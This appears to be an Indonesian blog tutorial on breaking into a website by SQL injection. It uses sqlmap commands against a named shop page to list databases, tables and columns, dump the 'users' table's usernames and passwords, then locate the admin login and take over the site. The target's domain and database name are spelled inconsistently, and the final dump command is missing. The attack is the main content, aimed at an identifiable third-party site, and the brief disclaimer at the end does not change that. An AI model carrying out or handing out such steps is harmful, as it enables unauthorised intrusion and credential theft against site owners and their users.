PC/Laptop
OS Linux/Windows
SQLMap
Brain
1. Kita cari dulu web yang pengen kita dump data nya dengan cara dorking dan test dengan ' , saya udah ketemu target web yang bakal kita coba dump datanya
2. Target website http://www.goodingproductions.com/shop.php?id=6 langsung kita coba buka terminal karena saya pake sqlmap di windows. commandnya sqlmap.py -u website_target --dbs tunggu sampai ketemu database nya
4. Saya memilih db gooding_goodingproductionscomngdm dan command selanjutnya sqlmap.py -u http://goodingproductionscom.com/shop.php?id=6 -D gooding_goodingproductionscomngdb --tables
5. dan selanjutnya akan terlihat tables nya dan pilih tables yang diinginkan
6. saya memilih tabel "users" dan next mencari columnnya maka commandnya sqlmap.py -u http://goodingproductionscom.com/shop.php?id=6 -D gooding_goodingproductionscomngdb -T users --column
7. hasilnya kita dapat column nya :D
8. KIta udah masuk tahap akhir. kita pilih column yang mau di dump. karena saya mau liat username dan paswordnya maka command nya
Hasilnyaaaa.....
Kita tinggal cari login page admin nya pake adminfinder aja dan masukin deh username dan password yang kita dapat dann kita menguasai web nya :v
OKe, itu dulu dari saya semoga tutorial ini tidak di salahgunakan :v Semoga bermanfaat.thanks
Tidak ada komentar:
Posting Komentar